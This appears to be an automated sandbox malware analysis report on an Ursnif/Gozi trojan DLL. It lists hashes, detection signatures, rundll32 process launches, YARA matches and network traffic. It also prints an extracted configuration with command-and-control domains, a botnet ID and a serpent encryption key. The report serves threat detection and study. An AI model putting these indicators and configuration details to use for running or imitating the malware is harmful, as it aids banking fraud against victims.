
Windows Analysis Report m87xfb63XU.dll

Overview

General Information

Sample Name: m87xfb63XU.dll
Analysis ID: 500399
MD5: 5aa733e108f0fa41df88cea0a309affe
SHA1: ce79918ca7845f2163360ea40a251912998ea226
SHA256: 1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
Tags: BRT, dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6444 cmdline: loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6408 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4352 cmdline: rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4520 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 876 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6952 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5396 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 1280 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6936 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 3676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 832 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | -
00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | -
(30 entries in total; only the first five are listed here)

Unpacked PEs

Source | Rule | Description | Author | Strings
2.3.rundll32.exe.2f3a31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | -
0.2.loaddll32.exe.2f194a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | -
2.3.rundll32.exe.2f3a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | -
0.3.loaddll32.exe.d5a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | -
4.3.rundll32.exe.68a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | -
(13 entries in total; only the first five are listed here)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (configuration identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: m87xfb63XU.dll | ReversingLabs: Detection: 22%
Source: m87xfb63XU.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49793 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49794 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.151.82:443 -> 192.168.2.3:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49796 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.151.2:443 -> 192.168.2.3:49797 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.97.151.66:443 -> 192.168.2.3:49798 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49846 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49848 version: TLS 1.2
Source: m87xfb63XU.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb{: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdb_:IE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb_POei source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbT$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: lbase.pdb source: WerFault.exe, 0000000D.00000003.552510597.0000000004D73000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbK@q source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbi: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdbEPue source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593784866.0000000004EF2000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbQPIer source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.586318313.00000000008D2000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000002.594044860.0000000002FE2000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdbf$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbM:{E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb@$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdb@ source: WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb+:EE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000003.578932063.0000000004B9E000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdbX$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbe: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbU:CEt source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000010.00000003.557389440.00000000034DB000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbC:}E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdbCP{e. source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdbq:oE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbj7 source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbC source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.828952358.000000006E83B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829929626.000000006E83B000.00000002.00020000.sdmp, m87xfb63XU.dll
                      Source: Binary string: sechost.pdbw:aE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.552382095.0000000002F9A000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.558219704.00000000034E6000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.560947472.00000000050F2000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580864219.0000000005704000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593490738.0000000004EE2000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb!:_Er source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.561052377.00000000050F0000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580812723.0000000005700000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593688376.0000000004EE0000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbY:wE source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000010.00000003.557399888.00000000034E1000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp, WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbIPae source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbH7|E source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbN$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000D.00000003.561222548.0000000005102000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.560886556.0000000005121000.00000004.00000001.sdmp, WerFault.exe, 00000010.00000003.580492113.0000000005731000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.593393717.0000000004DC1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdbo: source: WerFault.exe, 0000000D.00000003.561177036.00000000050F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbR$ source: WerFault.exe, 00000014.00000003.593743482.0000000004EE7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbwPge source: WerFault.exe, 00000010.00000003.580638492.0000000005707000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.151.2 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.151.66 187
                      Source: Joe Sandbox View | ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox View | IP Address: 40.97.161.50
                      Source: Joe Sandbox View | IP Address: 13.82.28.61
